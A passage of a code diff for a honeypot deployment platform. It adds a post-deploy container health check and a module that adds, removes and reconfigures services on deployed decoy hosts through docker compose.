||||||
|
line = line.strip()
|
||||||
|
if not line:
|
||||||
|
continue
|
||||||
|
try:
|
||||||
|
obj = json.loads(line)
|
||||||
|
except json.JSONDecodeError:
|
||||||
|
continue
|
||||||
|
if isinstance(obj, dict):
|
||||||
|
rows.append(obj)
|
||||||
|
elif isinstance(obj, list):
|
||||||
|
for item in obj:
|
||||||
|
if isinstance(item, dict):
|
||||||
|
rows.append(item)
|
||||||
|
return rows
|
||||||
|
|
||||||
|
|
||||||
def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None:
|
def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None:
|
||||||
import os
|
import os
|
||||||
# -p decnet pins the compose project name. Without it, docker compose
|
# -p decnet pins the compose project name. Without it, docker compose
|
||||||
@@ -953,8 +996,84 @@ async def deploy_topology(repo, topology_id: str, *, dry_run: bool = False) -> N
|
|||||||
)
|
)
|
||||||
raise
|
raise
|
||||||
|
|
||||||
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
|
# Post-deploy verification: ``compose up -d`` returns 0 the moment
|
||||||
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
|
# containers are *started*, so a service that crashes on boot
|
||||||
|
# (port bind failure, bad image, missing dependency) leaves the
|
||||||
|
# topology row sitting at ACTIVE while half the substrate is dead.
|
||||||
|
# Sample compose ps once and downgrade to DEGRADED if any expected
|
||||||
|
# container isn't running — operators see real state instead of an
|
||||||
|
# optimistic flag.
|
||||||
|
ps_rows = await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose_ps(compose_path),
|
||||||
|
)
|
||||||
|
bad: list[str] = []
|
||||||
|
# Build the per-decky state map. The base container's compose
|
||||||
|
# service name == decky name, which is what we cache on the
|
||||||
|
# TopologyDecky row. Service containers (named ``<decky>-<svc>``)
|
||||||
|
# don't gate the decky's state — service-level failures are visible
|
||||||
|
# in compose ps separately and don't downgrade the decky as a whole.
|
||||||
|
decky_state_by_name: dict[str, str] = {}
|
||||||
|
for row in ps_rows:
|
||||||
|
state = str(row.get("State", "")).lower()
|
||||||
|
service_name = str(row.get("Service") or "")
|
||||||
|
if service_name and "-" not in service_name:
|
||||||
|
# Plain decky base; cache its docker state.
|
||||||
|
decky_state_by_name[service_name] = state or "unknown"
|
||||||
|
if state and state != "running":
|
||||||
|
name = str(row.get("Name") or row.get("Service") or "?")
|
||||||
|
exit_code = row.get("ExitCode")
|
||||||
|
bad.append(
|
||||||
|
f"{name}={state}"
|
||||||
|
+ (f" (exit={exit_code})" if exit_code not in (None, 0, "") else "")
|
||||||
|
)
|
||||||
|
|
||||||
|
# Reconcile each TopologyDecky.state from compose's view. Without
|
||||||
|
# this, the row stays at the default 'pending' forever and the
|
||||||
|
# dashboard's ACTIVE DECKIES count reads 0/N even when everything's
|
||||||
|
# actually up.
|
||||||
|
for decky in hydrated["deckies"]:
|
||||||
|
cfg = decky.get("decky_config") or {}
|
||||||
|
decky_name = cfg.get("name") or decky.get("name")
|
||||||
|
if not decky_name:
|
||||||
|
continue
|
||||||
|
ds = decky_state_by_name.get(decky_name, "unknown")
|
||||||
|
new_state = "running" if ds == "running" else "failed"
|
||||||
|
try:
|
||||||
|
await repo.update_topology_decky(
|
||||||
|
decky["uuid"], {"state": new_state},
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
log.warning(
|
||||||
|
"post-deploy state reconcile failed topology=%s decky=%s: %s",
|
||||||
|
topology_id, decky_name, exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
if bad:
|
||||||
|
reason = "post-deploy check: " + ", ".join(bad[:8]) + (
|
||||||
|
f" and {len(bad) - 8} more" if len(bad) > 8 else ""
|
||||||
|
)
|
||||||
|
await transition_status(
|
||||||
|
repo, topology_id, TopologyStatus.DEGRADED, reason=reason,
|
||||||
|
)
|
||||||
|
log.warning(
|
||||||
|
"topology %s deployed but %d container(s) unhealthy: %s",
|
||||||
|
topology_id, len(bad), reason,
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
|
||||||
|
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
|
||||||
|
|
||||||
|
# Best-effort canary baseline seed across every decky in the
|
||||||
|
# topology. Same resilience contract as the fleet path: failures
|
||||||
|
# surface as state=failed token rows, never abort the deploy.
|
||||||
|
try:
|
||||||
|
from decnet.canary import planter as _canary_planter
|
||||||
|
await _canary_planter.seed_baseline_topology(repo, topology_id)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
log.warning(
|
||||||
|
"canary baseline seed failed (best-effort) topology=%s err=%s",
|
||||||
|
topology_id, exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
@_traced("engine.teardown_topology")
|
@_traced("engine.teardown_topology")
|
||||||
|
|||||||
673
decnet/engine/services_live.py
Normal file
673
decnet/engine/services_live.py
Normal file
@@ -0,0 +1,673 @@
|
|||||||
|
"""Add/remove a single service on a deployed decky without full redeploy.
|
||||||
|
|
||||||
|
The ``_compose()`` wrapper in :mod:`decnet.engine.deployer` already
|
||||||
|
supports per-service targeting (``up --no-deps -d <svc>``,
|
||||||
|
``stop <svc>``, ``rm -f <svc>``). What was missing was the
|
||||||
|
orchestration: regenerate the compose file (so future redeploys reflect
|
||||||
|
the change), persist the new ``services`` list, and run the targeted
|
||||||
|
compose command.
|
||||||
|
|
||||||
|
Two scopes:
|
||||||
|
|
||||||
|
* **Topology** — source of truth is the ``topology_deckies`` table; the
|
||||||
|
compose file is per-topology (``decnet-topology-<id8>-compose.yml``).
|
||||||
|
* **Fleet** — source of truth is ``decnet-state.json`` (with the
|
||||||
|
``fleet_deckies`` table mirroring it); compose is the unihost
|
||||||
|
``decnet-compose.yml``.
|
||||||
|
|
||||||
|
Both publish ``decky.<name>.service.added`` /
|
||||||
|
``decky.<name>.service.removed`` on the bus. The new topic constants
|
||||||
|
are documented in ``wiki-checkout/Service-Bus.md``.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import subprocess # nosec B404
|
||||||
|
from pathlib import Path
|
||||||
|
from typing import Any, Literal, Optional
|
||||||
|
|
||||||
|
import anyio
|
||||||
|
|
||||||
|
from decnet.bus import topics
|
||||||
|
from decnet.logging import get_logger
|
||||||
|
from decnet.services.base import BaseService
|
||||||
|
from decnet.services.registry import get_service
|
||||||
|
from decnet.topology.persistence import hydrate
|
||||||
|
from decnet.web.db.repository import BaseRepository
|
||||||
|
|
||||||
|
# Heavy imports (composer/deployer pull in decnet.network → docker) are
|
||||||
|
# deferred to call-sites via the ``_compose`` / ``_topology_compose_path``
|
||||||
|
# / ``_load_state`` indirection helpers below. Mirrors the lazy-import
|
||||||
|
# pattern in decnet.canary.planter for the same reason.
|
||||||
|
|
||||||
|
|
||||||
|
def _compose(*args: str, compose_file: Optional[Path] = None, env=None) -> None:
    """Forward a compose invocation to :func:`decnet.engine.deployer._compose`.

    Exists as a module-level seam so tests can replace it with
    ``monkeypatch.setattr(services_live, '_compose', ...)``. The deployer
    is imported at call time rather than at module import.

    When *compose_file* is ``None`` the keyword is omitted entirely, so
    the deployer's own default compose file applies.
    """
    from decnet.engine.deployer import _compose as deployer_compose

    forwarded = {"env": env}
    if compose_file is not None:
        forwarded["compose_file"] = compose_file
    deployer_compose(*args, **forwarded)
|
||||||
|
|
||||||
|
|
||||||
|
def _topology_compose_path(topology_id: str) -> Path:
    """Return the deployer's compose-file path for *topology_id*.

    Thin call-time delegate to
    :func:`decnet.engine.deployer._topology_compose_path`.
    """
    from decnet.engine.deployer import _topology_compose_path as deployer_path

    compose_path = deployer_path(topology_id)
    return compose_path
|
||||||
|
|
||||||
|
|
||||||
|
def _write_topology_compose(hydrated, path: Path) -> Path:
    """Write the compose file for a hydrated topology and return the result.

    Thin call-time delegate to
    :func:`decnet.topology.compose.write_topology_compose`.
    """
    from decnet.topology.compose import write_topology_compose as render_compose

    written = render_compose(hydrated, path)
    return written
|
||||||
|
|
||||||
|
|
||||||
|
def _load_state():
    """Return whatever :func:`decnet.config.load_state` returns.

    The import happens at call time, not at module import.
    """
    from decnet.config import load_state as load_fleet_state

    fleet_state = load_fleet_state()
    return fleet_state
|
||||||
|
|
||||||
|
|
||||||
|
def _save_state(config, compose_path) -> None:
    """Persist fleet state through :func:`decnet.config.save_state`.

    The import happens at call time; the delegate's return value is
    discarded.
    """
    from decnet.config import save_state as persist_fleet_state

    persist_fleet_state(config, compose_path)
|
||||||
|
|
||||||
|
|
||||||
|
def _write_compose(config, compose_path) -> None:
    """Regenerate the compose file through :func:`decnet.composer.write_compose`.

    The import happens at call time; the delegate's return value is
    discarded.
    """
    from decnet.composer import write_compose as render_fleet_compose

    render_fleet_compose(config, compose_path)
|
||||||
|
|
||||||
|
|
||||||
|
def _get_bus():
    """Return the bus produced by :func:`decnet.bus.factory.get_bus`.

    The import happens at call time, not at module import.
    """
    from decnet.bus.factory import get_bus as make_bus

    bus = make_bus()
    return bus
|
||||||
|
|
||||||
|
|
||||||
|
# --------------------------- swarm propagation helpers ---------------------------
|
||||||
|
#
|
||||||
|
# Service mutations (add/remove/update_config) on a deployed decky used to run
|
||||||
|
# the master's local docker-compose only. For swarm fleet deckies the master
|
||||||
|
# has no containers; for agent-targeted topologies the master only writes a
|
||||||
|
# compose file the worker never sees. These helpers replay the change to the
|
||||||
|
# worker so the env actually lands.
|
||||||
|
#
|
||||||
|
# Lazy imports keep this module's import graph clean (composer/swarm pull in
|
||||||
|
# decnet.network → docker, mirroring the pattern used elsewhere in this file).
|
||||||
|
|
||||||
|
|
||||||
|
async def _fleet_decky_host_uuid(repo: BaseRepository, decky_name: str) -> Optional[str]:
    """Look up the ``host_uuid`` recorded on *decky_name*'s shard row.

    Scans ``repo.list_decky_shards()`` and uses the first row whose
    ``decky_name`` matches. Returns ``None`` when no row matches, or when
    the matching row carries no ``host_uuid``.
    """
    shards = await repo.list_decky_shards()
    owner = next(
        (shard for shard in shards if shard.get("decky_name") == decky_name),
        None,
    )
    return None if owner is None else owner.get("host_uuid")
|
||||||
|
|
||||||
|
|
||||||
|
async def _redispatch_fleet_shard(repo: BaseRepository, host_uuid: str) -> None:
    """Push the deckies belonging to *host_uuid* back to that host's worker.

    Loads the master's fleet state, keeps only the deckies whose
    ``host_uuid`` attribute equals *host_uuid*, and hands a copy of the
    config restricted to those deckies to ``dispatch_decnet_config``.

    Logs a warning and returns without dispatching when there is no
    fleet state, or when no decky in the state belongs to the host.
    """
    from decnet.web.router.swarm.api_deploy_swarm import dispatch_decnet_config

    loaded = _load_state()
    if loaded is None:
        log.warning("redispatch_fleet_shard: no fleet state on master; skipping")
        return

    # State is a (config, compose path) pair; only the config is needed.
    config, _unused_path = loaded
    on_host = []
    for decky in config.deckies:
        if getattr(decky, "host_uuid", None) == host_uuid:
            on_host.append(decky)

    if on_host:
        shard_config = config.model_copy(update={"deckies": on_host})
        await dispatch_decnet_config(shard_config, repo)
        return

    log.warning(
        "redispatch_fleet_shard: master state has no deckies for host=%s; skipping",
        host_uuid,
    )
|
||||||
|
|
||||||
|
|
||||||
|
async def _resync_agent_topology(repo: BaseRepository, topology_id: str) -> None:
    """Push the topology to its worker, but only when it is agent-pinned.

    Does nothing when the topology cannot be hydrated or when its
    ``topology.target_host_uuid`` is empty. The latter is a unihost
    topology, where the local compose file is authoritative.
    """
    # Lazy import: the deployer pulls in heavier dependencies.
    from decnet.engine.deployer import resync_agent_topology

    snapshot = await hydrate(repo, topology_id)
    pinned_host = (
        None
        if snapshot is None
        else snapshot.get("topology", {}).get("target_host_uuid")
    )
    if pinned_host:
        await resync_agent_topology(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
|
# Module logger, registered under the "engine.services_live" name.
log = get_logger("engine.services_live")

# The two kinds of decky the public API dispatches on.
DeckyKind = Literal["fleet", "topology"]
|
||||||
|
|
||||||
|
|
||||||
|
class ServiceMutationError(ValueError):
    """Base class for failures the caller can correct.

    The API layer picks a 4xx status from the concrete subclass; this
    base class itself maps to 422.
    """
|
||||||
|
|
||||||
|
|
||||||
|
class ServiceNotFoundError(ServiceMutationError):
    """The requested decky or topology does not exist (mapped to 404)."""
|
||||||
|
|
||||||
|
|
||||||
|
class ServiceConflictError(ServiceMutationError):
    """The request breaks idempotency (mapped to 409).

    Raised when the service is already on the decky, or is not on it.
    """
|
||||||
|
|
||||||
|
|
||||||
|
def _validate_service_for_per_decky(name: str) -> BaseService:
    """Resolve *name* in the service registry for a per-decky mutation.

    Raises:
        ServiceMutationError: *name* is not registered, or the service is
            flagged ``fleet_singleton``. Such services run once per fleet
            (e.g. an LLMNR responder), so a per-decky add/remove is
            rejected instead of silently producing a no-op compose entry.
    """
    try:
        service = get_service(name)
    except KeyError as exc:
        raise ServiceMutationError(f"unknown service {name!r}") from exc

    if not service.fleet_singleton:
        return service

    raise ServiceMutationError(
        f"service {name!r} is fleet_singleton; not addable per-decky"
    )
|
||||||
|
|
||||||
|
|
||||||
|
async def _publish(topic: str, payload: dict[str, Any]) -> None:
    """Best-effort bus publish; failures are logged, never raised.

    Obtains a bus via ``_get_bus()``, connects, publishes *payload* on
    *topic*, and closes the bus again. The close runs in ``finally`` so a
    failed publish no longer leaves the connection open.

    Args:
        topic: Bus topic to publish on.
        payload: Message body handed to ``bus.publish``.
    """
    try:
        bus = _get_bus()
        await bus.connect()
        try:
            await bus.publish(topic, payload)
        finally:
            # Always release the connection, even when publish raised.
            await bus.close()
    except Exception as e:  # noqa: BLE001
        # Deliberately broad: a bus outage must not fail the mutation that
        # already succeeded.
        log.warning("services_live bus publish failed topic=%s err=%s", topic, e)
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------- topology path
|
||||||
|
|
||||||
|
|
||||||
|
async def _topology_decky(
    repo: BaseRepository, topology_id: str, decky_name: str,
) -> dict[str, Any]:
    """Return the hydrated decky row called *decky_name* in a topology.

    A row matches on ``decky_config["name"]`` when that is set, otherwise
    on the row's own ``name`` key.

    Raises:
        ServiceNotFoundError: the topology cannot be hydrated, or it holds
            no decky with that name.
    """
    snapshot = await hydrate(repo, topology_id)
    if snapshot is None:
        raise ServiceNotFoundError(f"topology {topology_id!r} not found")

    def _row_name(row: dict[str, Any]) -> Any:
        decky_cfg = row.get("decky_config") or {}
        return decky_cfg.get("name") or row.get("name")

    match = next(
        (row for row in snapshot["deckies"] if _row_name(row) == decky_name),
        None,
    )
    if match is not None:
        return match

    raise ServiceNotFoundError(
        f"decky {decky_name!r} is not in topology {topology_id!r}"
    )
|
||||||
|
|
||||||
|
|
||||||
|
async def _rerender_topology_compose(
    repo: BaseRepository, topology_id: str,
) -> Path:
    """Hydrate the topology again and rewrite its compose file.

    Run this after the DB update has landed. If it is skipped, the file
    on disk still lists the old service set and a later ``up -d`` would
    bring a removed service back.

    Returns:
        The path of the compose file that was written.

    Raises:
        ServiceNotFoundError: the topology vanished between the DB write
            and this call.
    """
    snapshot = await hydrate(repo, topology_id)
    if snapshot is None:  # pragma: no cover — narrow race
        raise ServiceNotFoundError(
            f"topology {topology_id!r} disappeared mid-mutation"
        )

    compose_file = _topology_compose_path(topology_id)
    _write_topology_compose(snapshot, compose_file)
    return compose_file
|
||||||
|
|
||||||
|
|
||||||
|
async def _add_topology_service(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
    initial_config: dict | None = None,
) -> list[str]:
    """Add *service_name* to a topology decky and bring it up.

    Order of operations: update the DB row, re-render the compose file,
    then either resync the worker (agent-pinned topology) or run
    ``compose up -d --no-deps --build`` for the new container locally.

    Returns:
        The decky's services list after the addition.

    Raises:
        ServiceNotFoundError: the topology or decky does not exist.
        ServiceConflictError: the service is already on the decky.
    """
    decky_row = await _topology_decky(repo, topology_id, decky_name)
    existing: list[str] = list(decky_row.get("services") or [])
    if service_name in existing:
        raise ServiceConflictError(
            f"service {service_name!r} already on decky {decky_name!r}"
        )
    updated = existing + [service_name]

    patch: dict[str, Any] = {"services": updated}
    if initial_config:
        # Merge the config into decky_config before the compose file is
        # regenerated, so the first ``up`` already carries the env and no
        # follow-up apply is needed.
        decky_cfg = dict(decky_row.get("decky_config") or {})
        per_service = dict(decky_cfg.get("service_config") or {})
        per_service[service_name] = initial_config
        decky_cfg["service_config"] = per_service
        patch["decky_config"] = decky_cfg
    await repo.update_topology_decky(decky_row["uuid"], patch)

    compose_path = await _rerender_topology_compose(repo, topology_id)
    if not await _topology_is_agent_pinned(repo, topology_id):
        container = f"{decky_name}-{service_name}"

        def _bring_up():
            return _compose(
                "up", "-d", "--no-deps", "--build", container,
                compose_file=compose_path,
            )

        # Compose runs in a worker thread so the API event loop stays
        # responsive.
        await anyio.to_thread.run_sync(_bring_up)
    else:
        # Agent-pinned: the master has nothing to start locally, so the
        # new hydrated blob is pushed to the worker instead.
        await _resync_agent_topology(repo, topology_id)
    return updated
|
||||||
|
|
||||||
|
|
||||||
|
async def _topology_is_agent_pinned(repo: BaseRepository, topology_id: str) -> bool:
    """Tell whether the topology has a non-empty ``target_host_uuid``.

    A topology that cannot be hydrated counts as not pinned.
    """
    snapshot = await hydrate(repo, topology_id)
    if snapshot is not None:
        return bool(snapshot.get("topology", {}).get("target_host_uuid"))
    return False
|
||||||
|
|
||||||
|
|
||||||
|
async def _remove_topology_service(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
) -> list[str]:
    """Remove *service_name* from a topology decky.

    For a local topology the container is stopped and removed first, and
    only then is the DB row updated and the compose file re-rendered. An
    agent-pinned topology skips the local compose calls and resyncs the
    worker after the DB and compose updates.

    Returns:
        The decky's services list after the removal.

    Raises:
        ServiceNotFoundError: the topology or decky does not exist.
        ServiceConflictError: the service is not on the decky.
    """
    decky_row = await _topology_decky(repo, topology_id, decky_name)
    existing: list[str] = list(decky_row.get("services") or [])
    if service_name not in existing:
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )
    remaining = [svc for svc in existing if svc != service_name]

    container = f"{decky_name}-{service_name}"
    compose_path = _topology_compose_path(topology_id)
    pinned = await _topology_is_agent_pinned(repo, topology_id)

    if not pinned:
        # Stop and rm come before the DB write. If compose fails halfway,
        # the container is still running and the DB still lists the
        # service, which is a clear state to retry from.
        for compose_args in (("stop", container), ("rm", "-f", container)):
            await anyio.to_thread.run_sync(
                lambda argv=compose_args: _compose(*argv, compose_file=compose_path),
            )

    await repo.update_topology_decky(decky_row["uuid"], {"services": remaining})
    await _rerender_topology_compose(repo, topology_id)

    if pinned:
        # The worker removes the service when it diffs the incoming
        # hydrated blob against its current state.
        await _resync_agent_topology(repo, topology_id)
    return remaining
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------- fleet path
|
||||||
|
|
||||||
|
|
||||||
|
def _fleet_state_or_raise() -> tuple[Any, Path]:
    """Load the saved fleet state as ``(config, compose_path)``.

    Raises:
        ServiceMutationError: ``_load_state()`` returned ``None``, meaning
            no fleet has been brought up yet.
    """
    loaded = _load_state()
    if loaded is not None:
        return loaded
    raise ServiceMutationError(
        "no fleet state on disk — run `decnet up` first"
    )
|
||||||
|
|
||||||
|
|
||||||
|
def _fleet_find_decky(config: Any, decky_name: str) -> Any:
|
||||||
|
for d in config.deckies:
|
||||||
|
if d.name == decky_name:
|
||||||
|
return d
|
||||||
|
raise ServiceNotFoundError(f"fleet decky {decky_name!r} not found")
|
||||||
|
|
||||||
|
|
||||||
|
async def _persist_fleet_change(
    repo: BaseRepository, decky: Any, services: list[str], compose_path: Path,
) -> None:
    """Persist the mutation to JSON state, compose file, and the DB row.

    The fleet state is re-loaded from disk and the decky is looked up
    again by name, so the object written out is the freshly loaded one and
    not the caller's *decky*. Any ``service_config`` the caller stashed on
    *decky* (e.g. the initial config of a newly added service) is therefore
    copied across explicitly; otherwise it would be dropped from the saved
    state, the compose file and the DB row.

    Args:
        repo: Repository used to upsert the fleet-decky row.
        decky: The caller's in-memory decky; supplies ``name``, ``ip``,
            ``host_uuid`` and any pending ``service_config``.
        services: The post-mutation services list.
        compose_path: Where the state and compose file are written.

    Raises:
        ServiceMutationError: no fleet state is on disk any more.
        ServiceNotFoundError: the decky is missing from the reloaded state.
    """
    # Guarded load: a bare unpack of a missing state would raise TypeError.
    config, _ = _fleet_state_or_raise()
    target = _fleet_find_decky(config, decky.name)
    target.services = services

    # NOTE(review): assumes _load_state() returns a fresh object per call;
    # if it returns the caller's own object this copy is a harmless no-op.
    pending_service_config = getattr(decky, "service_config", None)
    if pending_service_config is not None:
        target.service_config = dict(pending_service_config)

    _save_state(config, compose_path)
    _write_compose(config, compose_path)

    # Mirror to the DB row so DB-only consumers (dashboard, API) see the
    # change without waiting for the reconciler.
    from decnet.web.db.models import LOCAL_HOST_SENTINEL

    await repo.upsert_fleet_decky({
        "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
        "name": decky.name,
        "services": services,
        "decky_config": target.model_dump(mode="json"),
        "decky_ip": decky.ip,
        "state": "running",
    })
|
||||||
|
|
||||||
|
|
||||||
|
async def _add_fleet_service(
    repo: BaseRepository,
    decky_name: str,
    service_name: str,
    initial_config: dict | None = None,
) -> list[str]:
    """Add *service_name* to a fleet decky and bring it up.

    Persists the change through ``_persist_fleet_change``. A decky that
    lives on a swarm worker then has its host shard re-dispatched; a local
    decky gets ``compose up -d --no-deps --build`` for the new container.

    Returns:
        The decky's services list after the addition.

    Raises:
        ServiceMutationError: no fleet state on disk.
        ServiceNotFoundError: the decky does not exist.
        ServiceConflictError: the service is already on the decky.
    """
    fleet_config, compose_path = _fleet_state_or_raise()
    decky = _fleet_find_decky(fleet_config, decky_name)

    existing: list[str] = list(decky.services or [])
    if service_name in existing:
        raise ServiceConflictError(
            f"service {service_name!r} already on decky {decky_name!r}"
        )
    updated = existing + [service_name]

    if initial_config:
        # Stash the validated cfg on the decky model, the same way
        # _update_fleet_service_config does.
        per_service = dict(getattr(decky, "service_config", None) or {})
        per_service[service_name] = initial_config
        decky.service_config = per_service

    await _persist_fleet_change(repo, decky, updated, compose_path)

    worker_uuid = await _fleet_decky_host_uuid(repo, decky_name)
    if not worker_uuid:
        container = f"{decky_name}-{service_name}"

        def _bring_up():
            return _compose(
                "up", "-d", "--no-deps", "--build", container,
                compose_file=compose_path,
            )

        await anyio.to_thread.run_sync(_bring_up)
    else:
        # The master holds no container for this decky; re-pushing the
        # host's shard makes the worker create the new service.
        await _redispatch_fleet_shard(repo, worker_uuid)
    return updated
|
||||||
|
|
||||||
|
|
||||||
|
async def _remove_fleet_service(
    repo: BaseRepository, decky_name: str, service_name: str,
) -> list[str]:
    """Remove *service_name* from a fleet decky.

    A local decky has its container stopped and removed before anything is
    persisted. A swarm-hosted decky skips the local compose calls and has
    its host shard re-dispatched after the change is persisted.

    Returns:
        The decky's services list after the removal.

    Raises:
        ServiceMutationError: no fleet state on disk.
        ServiceNotFoundError: the decky does not exist.
        ServiceConflictError: the service is not on the decky.
    """
    fleet_config, compose_path = _fleet_state_or_raise()
    decky = _fleet_find_decky(fleet_config, decky_name)

    existing: list[str] = list(decky.services or [])
    if service_name not in existing:
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )
    remaining = [svc for svc in existing if svc != service_name]

    container = f"{decky_name}-{service_name}"
    worker_uuid = await _fleet_decky_host_uuid(repo, decky_name)

    if not worker_uuid:
        # Local: stop and rm before persisting, so a compose failure
        # halfway leaves a clear state to retry from. Swarm deckies skip
        # this; the worker's compose handles the removal once the
        # re-dispatched config no longer lists the service.
        for compose_args in (("stop", container), ("rm", "-f", container)):
            await anyio.to_thread.run_sync(
                lambda argv=compose_args: _compose(*argv, compose_file=compose_path),
            )

    await _persist_fleet_change(repo, decky, remaining, compose_path)

    if worker_uuid:
        await _redispatch_fleet_shard(repo, worker_uuid)
    return remaining
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------- public api
|
||||||
|
|
||||||
|
|
||||||
|
async def add_service(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    topology_id: Optional[str] = None,
    config: dict | None = None,
) -> list[str]:
    """Add *service_name* to a deployed decky.

    Steps, in order:

    1. Validate the service name against the registry (unknown and
       ``fleet_singleton`` names are rejected).
    2. Validate the optional ``config`` with the service's
       ``validate_cfg``. ``config`` has the same dict shape that
       PUT/POST .../config accepts. This happens before any state write,
       so a 400-class failure leaves no side effects.
    3. Dispatch to the topology or fleet helper, which persists the
       change, regenerates the compose file and starts the
       ``<decky>-<service>`` container (or resyncs the worker).
    4. Publish ``decky.<name>.service.added`` on the bus.

    Returns:
        The post-mutation services list.

    Raises:
        ServiceMutationError: validation failed, or ``decky_kind`` is
            ``"topology"`` without a ``topology_id``. Subclasses signal
            not-found and conflict cases.
    """
    service = _validate_service_for_per_decky(service_name)
    initial_config = {} if not config else service.validate_cfg(config)

    if decky_kind not in ("topology", "fleet"):  # pragma: no cover — Literal narrows
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")

    if decky_kind == "fleet":
        services = await _add_fleet_service(
            repo, decky_name, service_name,
            initial_config=initial_config,
        )
    else:
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        services = await _add_topology_service(
            repo, topology_id, decky_name, service_name,
            initial_config=initial_config,
        )

    event_topic = topics.decky(decky_name, topics.DECKY_SERVICE_ADDED)
    event_body = {
        "decky_name": decky_name,
        "service_name": service_name,
        "topology_id": topology_id,
        "services": services,
    }
    await _publish(event_topic, event_body)

    log.info(
        "services_live.add decky=%s topology=%s service=%s",
        decky_name, topology_id, service_name,
    )
    return services
|
||||||
|
|
||||||
|
|
||||||
|
async def update_service_config(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    cfg: dict,
    apply: bool = False,
    topology_id: Optional[str] = None,
) -> dict:
    """Store ``cfg`` as the decky's new ``service_config[service_name]``.

    ``cfg`` is validated against the service's ``config_schema`` (unknown
    keys dropped, types coerced) before any DB write, so a 400-class
    failure leaves no side effects.

    Modes:

    * ``apply=False`` (Save): only the persisted state and the compose
      file change. The running container keeps its old env.
    * ``apply=True`` (Apply): same persistence, followed by a
      force-recreate of ``<decky>-<service>`` so the container picks up
      the new env. This is destructive: any in-container session state on
      that service is lost.

    Publishes the ``DECKY_SERVICE_CONFIG_CHANGED`` event afterwards.

    Returns:
        The validated cfg that was stored.

    Raises:
        ServiceMutationError: validation failed, or ``decky_kind`` is
            ``"topology"`` without a ``topology_id``. Subclasses signal
            not-found and conflict cases.
    """
    service = _validate_service_for_per_decky(service_name)
    validated = service.validate_cfg(cfg)

    if decky_kind not in ("topology", "fleet"):  # pragma: no cover
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")

    if decky_kind == "fleet":
        await _update_fleet_service_config(
            repo, decky_name, service_name, validated, apply=apply,
        )
    else:
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        await _update_topology_service_config(
            repo, topology_id, decky_name, service_name, validated, apply=apply,
        )

    event_topic = topics.decky(decky_name, topics.DECKY_SERVICE_CONFIG_CHANGED)
    event_body = {
        "decky_name": decky_name,
        "service_name": service_name,
        "topology_id": topology_id,
        "service_config": validated,
        "recreated": bool(apply),
    }
    await _publish(event_topic, event_body)

    log.info(
        "services_live.update_config decky=%s topology=%s service=%s apply=%s",
        decky_name, topology_id, service_name, apply,
    )
    return validated
|
||||||
|
|
||||||
|
|
||||||
|
async def _update_topology_service_config(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
    validated: dict,
    *,
    apply: bool,
) -> None:
    """Write *validated* into a topology decky's ``service_config``.

    The DB row and the compose file are always updated. With
    ``apply=True`` the change is also pushed live: an agent-pinned
    topology is resynced to its worker, and a local one has the
    ``<decky>-<service>`` container force-recreated.

    Raises:
        ServiceNotFoundError: the topology or decky does not exist.
        ServiceConflictError: the service is not on the decky.
    """
    decky_row = await _topology_decky(repo, topology_id, decky_name)
    if service_name not in (decky_row.get("services") or []):
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )

    decky_cfg = dict(decky_row.get("decky_config") or {})
    per_service = dict(decky_cfg.get("service_config") or {})
    per_service[service_name] = validated
    decky_cfg["service_config"] = per_service
    await repo.update_topology_decky(decky_row["uuid"], {"decky_config": decky_cfg})

    compose_path = await _rerender_topology_compose(repo, topology_id)
    if not apply:
        return

    if await _topology_is_agent_pinned(repo, topology_id):
        await _resync_agent_topology(repo, topology_id)
        return

    container = f"{decky_name}-{service_name}"

    def _recreate():
        return _compose(
            "up", "-d", "--no-deps", "--force-recreate", "--build", container,
            compose_file=compose_path,
        )

    await anyio.to_thread.run_sync(_recreate)
|
||||||
|
|
||||||
|
|
||||||
|
async def _update_fleet_service_config(
    repo: BaseRepository,
    decky_name: str,
    service_name: str,
    validated: dict,
    *,
    apply: bool,
) -> None:
    """Write *validated* into a fleet decky's ``service_config``.

    The JSON state, compose file and DB row are always updated. With
    ``apply=True`` the change is also pushed live: a swarm-hosted decky
    has its host shard re-dispatched, and a local one has the
    ``<decky>-<service>`` container removed by name and then
    force-recreated through compose.

    Raises:
        ServiceMutationError: no fleet state on disk.
        ServiceNotFoundError: the decky does not exist.
        ServiceConflictError: the service is not on the decky.
    """
    fleet_config, compose_path = _fleet_state_or_raise()
    decky = _fleet_find_decky(fleet_config, decky_name)
    if service_name not in (decky.services or []):
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )

    per_service = dict(getattr(decky, "service_config", None) or {})
    per_service[service_name] = validated
    decky.service_config = per_service

